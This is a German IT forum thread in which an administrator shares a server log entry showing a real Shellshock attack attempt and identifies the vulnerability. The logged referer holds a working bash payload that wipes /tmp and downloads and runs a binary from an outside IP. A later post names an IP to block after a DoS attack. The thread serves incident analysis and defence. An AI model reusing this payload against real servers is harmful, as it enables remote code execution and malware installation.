zahni 521 Geschrieben 18. August 2015 Melden Teilen Geschrieben 18. August 2015 (bearbeitet) Hi, ich habe in den Logs von unserem Public WWW.Server das Folgende gefunden: [Mon Aug 17 06:04:33 2015] [error] [client 58.213.123.107] client denied by server configuration: /www/sites/******/html/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:999/ssh -O /tmp/China.Z-cygy >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-cygy >> /tmp/Run.sh;echo /tmp/China.Z-cygy >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh" Aus Neugierde: Hat jemand 'ne Ahnung, welche Sicherheitslücke das sein soll? Spontan würde ich ja auf Apache tippen, aber... PS: 61.160.212.172 stammt natürlich aus China. Edit: Habe es gefunden: "Shellshock" bearbeitet 18. August 2015 von zahni 2 Zitieren Link zu diesem Kommentar
zahni 521 Geschrieben 19. August 2015 Autor Melden Teilen Geschrieben 19. August 2015 PS: Eine Adresse (oder eventuell das ganze Netz), die Ihr auf der Firewall sperren solltet ist 82.80.249.159 Gestern Nacht lief da ein kleiner DOS-Angriff u.a. mit rotierenden User Agents. Kommt aus Israel. Taucht in unseren Logs öfter auf. Zitieren Link zu diesem Kommentar
s_sonnen 20 Geschrieben 19. August 2015 Melden Teilen Geschrieben 19. August 2015 Hi zahni. Danke für die Info, ich hab' sie mal an unseren Sicherheitsguru weitergeleitet, mal guggn was er draus macht. ciao und 'nen angenehmen Mittwochnachmittag M. Zitieren Link zu diesem Kommentar
Empfohlene Beiträge
Schreibe einen Kommentar
Du kannst jetzt antworten und Dich später registrieren. Falls Du bereits ein Mitglied bist, logge Dich jetzt ein.